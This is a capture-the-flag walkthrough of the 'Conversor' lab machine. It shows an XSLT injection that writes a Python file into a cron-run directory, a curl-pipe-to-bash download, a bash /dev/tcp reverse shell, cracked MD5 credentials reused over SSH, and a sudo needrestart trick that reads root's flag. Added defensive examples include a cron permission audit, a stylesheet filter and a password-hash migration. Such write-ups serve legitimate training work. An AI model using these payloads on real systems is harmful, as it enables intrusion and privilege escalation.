
Information gathering
┌──(root㉿kali)-[~]
└─# nmap -A -Pn 10.129.6.82
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-27 13:26 EST
Stats: 0:00:35 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.65% done; ETC: 13:27 (0:00:00 remaining)
Nmap scan report for 10.129.6.82 (10.129.6.82)
Host is up (0.66s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 01:74:26:39:47:bc:6a:e2:cb:12:8b:71:84:9c:f8:5a (ECDSA)
|_ 256 3a:16:90:dc:74:d8:e3:c4:51:36:e2:08:06:26:17:ee (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://conversor.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.14
Network Distance: 2 hops
Service Info: Host: conversor.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 5900/tcp)
HOP RTT ADDRESS
1 579.05 ms 10.10.16.1 (10.10.16.1)
2 273.23 ms 10.129.6.82 (10.129.6.82)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.53 seconds
echo "10.129.6.82 conversor.htb" >> /etc/hosts
┌──(root㉿kali)-[~]
└─# dirsearch -u http://conversor.htb/
dirsearch v0.4.3
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/http_conversor.htb/__26-02-27_13-37-52.txt
Target: http://conversor.htb/
[13:37:52] Starting:
[13:38:39] 200 - 3KB - /about
[13:40:15] 404 - 275B - /javascript/tiny_mce
[13:40:15] 404 - 275B - /javascript/editors/fckeditor
[13:40:15] 301 - 319B - /javascript -> http://conversor.htb/javascript/
[13:40:21] 200 - 722B - /login
[13:40:59] 200 - 726B - /register
[13:41:07] 403 - 278B - /server-status
[13:41:07] 403 - 278B - /server-status/
Web

The site offers the application's source code for download, so a quick audit is possible.
It uses the lxml library, and the application relies on a cron job to clean up files:
If you want to run Python scripts (for example, our server deletes all files older than 60 minutes to avoid system overload), you can add the following line to your /etc/crontab: * * * * * www-data for f in /var/www/conversor.htb/scripts/*.py; do python3 "$f"; done
So every minute the system executes, as www-data, every .py file under /var/www/conversor.htb/scripts/.
That means writing a .py file into that directory gives code execution. The application parses XML and transforms it with XSLT, so the way in is XSLT injection.
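The cron line above is the root cause on the defensive side: a directory that the web user can write to is also the directory whose contents cron executes as that user. The following audit script is an added example (not part of the original writeup or the Conversor application) that checks a cron-executed script directory for exactly this condition. It assumes the cron runner is uid 33 (www-data's conventional uid on Debian/Ubuntu, used here as a constructed value) and builds a throwaway fixture directory instead of touching /var/www.

```python
import os
import stat
import tempfile
from pathlib import Path

# Constructed assumption: the cron job runs as www-data, uid/gid 33 on Debian/Ubuntu.
RUNNER_UID = 33
RUNNER_GIDS = {33}


def _writable_by(st: os.stat_result, uid: int, gids: set) -> bool:
    """True if a process with this uid and group set could write the inode.
    Plain mode bits only: root and POSIX ACLs are deliberately out of scope."""
    m = st.st_mode
    if uid == st.st_uid and m & stat.S_IWUSR:
        return True
    if st.st_gid in gids and m & stat.S_IWGRP:
        return True
    return bool(m & stat.S_IWOTH)


def audit_cron_script_dir(directory: str, runner_uid: int, runner_gids: set,
                          pattern: str = "*.py") -> list:
    """Return human-readable findings for a directory whose files cron executes.

    Flags: the directory itself being writable by the runner (new scripts can be
    dropped in), world-writable directories without the sticky bit, symlinked
    scripts (the target may live elsewhere), and scripts the runner can modify."""
    findings = []
    d = Path(directory)
    dst = d.stat()
    if _writable_by(dst, runner_uid, runner_gids):
        findings.append(f"{d}: directory writable by runner uid {runner_uid}; "
                        "any file dropped here will be executed")
    if dst.st_mode & stat.S_IWOTH and not dst.st_mode & stat.S_ISVTX:
        findings.append(f"{d}: world-writable without sticky bit")
    for f in sorted(d.glob(pattern)):
        st = f.lstat()
        if stat.S_ISLNK(st.st_mode):
            findings.append(f"{f}: symlink to {os.readlink(f)}; target is outside "
                            "the audited directory's control")
            continue
        if _writable_by(st, runner_uid, runner_gids):
            findings.append(f"{f}: script writable by runner uid {runner_uid}")
        if st.st_mode & stat.S_IWOTH:
            findings.append(f"{f}: world-writable")
    return findings


def build_demo_dir() -> str:
    """Constructed fixture: a scripts directory left the way a careless deployment might."""
    d = tempfile.mkdtemp(prefix="scripts-audit-demo-")
    safe = Path(d, "cleanup.py")
    safe.write_text("# deletes uploads older than 60 minutes\n")
    safe.chmod(0o644)                      # owner-writable only: fine
    loose = Path(d, "rotate.py")
    loose.write_text("# rotates logs\n")
    loose.chmod(0o666)                     # world-writable: anyone can replace it
    Path(d, "external.py").symlink_to("/tmp/somewhere-else.py")  # dangling, on purpose
    os.chmod(d, 0o777)                     # directory itself is world-writable, no sticky bit
    return d


if __name__ == "__main__":
    demo = build_demo_dir()
    for line in audit_cron_script_dir(demo, RUNNER_UID, RUNNER_GIDS):
        print(line)
```

The fix the audit points at is the usual one: the directory and its scripts should be owned by root and writable only by root (0755 / 0644), and the cron entry should name specific scripts rather than globbing a directory the service account can populate.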
┌──(root㉿kali)-[/home/kali/Desktop]
└─# cat XSLT.xsl
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:exsl="http://exslt.org/common"
extension-element-prefixes="exsl">
<xsl:template match="/">
<exsl:document href="file:///var/www/conversor.htb/scripts/shell.py" method="text">
import os
os.system("curl 10.10.16.35:8000/shell.sh|bash")
</exsl:document>
<xsl:text>Done</xsl:text>
</xsl:template>
</xsl:stylesheet>
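What makes the stylesheet above dangerous is not XSLT itself but the EXSLT document extension, which lets a transform write files wherever the process can. The following pre-check is an added example, not code from the writeup or from the Conversor application: it parses an uploaded stylesheet with the standard library and rejects it if it declares extension prefixes, uses write-capable extension elements, pulls in external stylesheets, or calls document(). Both sample stylesheets in the block are constructed; the hostile one mirrors the shape of the payload shown above with a harmless body.

```python
import xml.etree.ElementTree as ET

XSL_NS = "http://www.w3.org/1999/XSL/Transform"

# Extension namespaces whose elements can write files (EXSLT common's <document>,
# and the SAXON / Xalan / libxslt output extensions). Constructed allowlist-by-denial
# for this example; a real deployment would allow only a vetted set of stylesheets.
WRITE_CAPABLE_NS = {
    "http://exslt.org/common",
    "http://icl.com/saxon",
    "http://xml.apache.org/xalan",
    "http://xmlsoft.org/XSLT/namespace",
}
# XSL elements that fetch external resources at compile time.
EXTERNAL_FETCH_TAGS = {f"{{{XSL_NS}}}include", f"{{{XSL_NS}}}import"}


def _split_tag(tag: str):
    """ElementTree encodes namespaced tags as '{ns}local'."""
    if tag.startswith("{"):
        ns, local = tag[1:].split("}", 1)
        return ns, local
    return "", tag


def audit_stylesheet(xsl_text: str) -> list:
    """Return a list of reasons to reject the stylesheet; empty means nothing was flagged."""
    findings = []
    try:
        root = ET.fromstring(xsl_text)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    prefixes = root.get("extension-element-prefixes")
    if prefixes:
        findings.append(f"declares extension-element-prefixes={prefixes!r}")
    for el in root.iter():
        if not isinstance(el.tag, str):       # comments / PIs, if a parser keeps them
            continue
        ns, local = _split_tag(el.tag)
        if ns in WRITE_CAPABLE_NS:
            href = el.get("href")
            findings.append(f"extension element {local} from {ns}"
                            + (f" href={href!r}" if href else ""))
        if el.tag in EXTERNAL_FETCH_TAGS:
            findings.append(f"xsl:{local} href={el.get('href')!r}")
        for attr, val in el.attrib.items():
            if "document(" in val:              # XPath document() reads arbitrary URIs
                findings.append(f"document() in {local}@{attr}: {val!r}")
    return findings


# Constructed sample: a plain transform with no extensions.
BENIGN_XSL = """<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:output method="text"/>
  <xsl:template match="/">Title: <xsl:value-of select="/doc/title"/></xsl:template>
</xsl:stylesheet>"""

# Constructed sample: same structure as the writeup's payload, harmless body.
HOSTILE_XSL = """<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:exsl="http://exslt.org/common"
    extension-element-prefixes="exsl">
  <xsl:template match="/">
    <exsl:document href="file:///var/www/conversor.htb/scripts/shell.py" method="text">
print("constructed placeholder body")
    </exsl:document>
    <xsl:text>Done</xsl:text>
  </xsl:template>
</xsl:stylesheet>"""


if __name__ == "__main__":
    print("benign:", audit_stylesheet(BENIGN_XSL))
    print("hostile:", audit_stylesheet(HOSTILE_XSL))
```

A static check like this is a screen, not a sandbox. The runtime counterpart in lxml is `etree.XSLTAccessControl` (for example `etree.XSLT(stylesheet, access_control=etree.XSLTAccessControl.DENY_ALL)`), which stops the transform from reading or writing files and network resources regardless of what the stylesheet says; and the strongest fix is to not accept user-supplied stylesheets at all.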
Then upload it on the home page; any XML file will do for the other upload. Write the reverse shell file:
bash -i >& /dev/tcp/10.10.16.35/2333 0>&1

Then, on the attacking machine:
python3 -m http.server 8000
nc -lvvp 2333
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lvvp 2333
listening on [any] 2333 ...
connect to [10.10.16.35] from conversor.htb [10.129.6.82] 43624
bash: cannot set terminal process group (4665): Inappropriate ioctl for device
bash: no job control in this shell
www-data@conversor:~$ whoami
whoami
www-data
www-data@conversor:~$ ls
ls
conversor.htb
Inside conversor.htb there is a users.db file; pull it back and inspect it with sqlite3.
┌──(root㉿kali)-[/home/kali/Desktop]
└─# wget http://10.129.6.82:8000/users.db
--2026-02-27 14:57:06-- http://10.129.6.82:8000/users.db
Connecting to 10.129.6.82:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 24576 (24K) [application/octet-stream]
Saving to: ‘users.db’
users.db 100%[==========>] 24.00K 22.2KB/s in 1.1s
2026-02-27 14:57:07 (22.2 KB/s) - ‘users.db’ saved [24576/24576]
sqlite3 users.db
sqlite> .tables
files users
sqlite> select * from users;
1|fismathack|5b5c3ac3a1c897c94caad48e6c71fdec
5|1|c4ca4238a0b923820dcc509a6f75849b

Testing showed that this is the SSH password.
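The users table stores 32-character hex digests with no salt and no algorithm marker, which is what made the password recoverable and reusable for SSH. The block below is an added example, not code from the writeup or the application, showing how a defender would detect such legacy records and migrate them transparently at login to salted PBKDF2-HMAC-SHA256 from the standard library. The record format (`pbkdf2_sha256$iterations$salt$digest`) and the 600,000 iteration count are this example's own choices.

```python
import hashlib
import hmac
import os
import re
from typing import Optional, Tuple

LEGACY_MD5_RE = re.compile(r"^[0-9a-f]{32}$")
ITERATIONS = 600_000          # chosen for this example; tune to the deployment's latency budget
ALGO = "pbkdf2_sha256"        # record format is this example's own convention


def is_legacy_unsalted_md5(stored: str) -> bool:
    """A bare 32-hex string with no prefix is the shape of an unsalted MD5 record."""
    return bool(LEGACY_MD5_RE.match(stored))


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Produce a salted, iterated record: algo$iterations$salt_hex$digest_hex."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"{ALGO}${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Constant-time check of a password against a record produced by hash_password."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != ALGO:
        return False
    _, iters, salt_hex, dk_hex = parts
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def upgrade_on_login(password: str, stored: str) -> Tuple[bool, str]:
    """Verify against whatever the row holds. If the row is a legacy unsalted MD5 and the
    password is correct, return the new record so the caller can overwrite the row."""
    if is_legacy_unsalted_md5(stored):
        ok = hmac.compare_digest(hashlib.md5(password.encode("utf-8")).hexdigest(), stored)
        return ok, (hash_password(password) if ok else stored)
    return verify_password(password, stored), stored


def legacy_md5_record(password: str) -> str:
    """Constructed helper: build a legacy-style row the way the vulnerable app did."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


if __name__ == "__main__":
    row = legacy_md5_record("demo-pass")          # constructed sample row
    ok, new_row = upgrade_on_login("demo-pass", row)
    print(ok, new_row.split("$")[0])
```

Two properties matter here: the same password now produces a different record every time (so equal hashes across users no longer leak equal passwords), and a legacy row is rewritten only after a successful login, so the migration needs no plaintexts and no user action.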
User
┌──(root㉿kali)-[/home/kali/Desktop]
└─# ssh fismathack@conversor.htb
The authenticity of host 'conversor.htb (10.129.6.82)' can't be established.
ED25519 key fingerprint is SHA256:xCQV5IVWuIxtwatNjsFrwT7VS83ttIlDqpHrlnXiHR8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'conversor.htb' (ED25519) to the list of known hosts.
fismathack@conversor.htb's password:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-160-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Fri Feb 27 08:02:13 PM UTC 2026
System load: 0.0 Processes: 220
Usage of /: 65.0% of 5.78GB Users logged in: 0
Memory usage: 8% IPv4 address for eth0: 10.129.6.82
Swap usage: 0%
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Fri Feb 27 20:02:16 2026 from 10.10.16.35
fismathack@conversor:~$ ls
user.txt
fismathack@conversor:~$ cat user.txt
Privilege escalation
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
First, enumerate the usual Linux privilege-escalation paths; nothing useful turned up.
/usr/sbin/needrestart can read files directly:

fismathack@conversor:~$ sudo -l
Matching Defaults entries for fismathack on conversor:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User fismathack may run the following commands on conversor:
(ALL : ALL) NOPASSWD: /usr/sbin/needrestart
fismathack@conversor:~$ sudo needrestart -c /root/root.txt
Bareword found where operator expected at (eval 14) line 1, near "8c5e1986d850cffcfb941c30f2f38cc1"
(Missing operator before c5e1986d850cffcfb941c30f2f38cc1?)
Error parsing /root/root.txt: syntax error at (eval 14) line 2, near "8c5e1986d850cffcfb941c30f2f38cc1
"
fismathack@conversor:~$ Read from remote host conversor.htb: No route to host
Connection to conversor.htb closed.
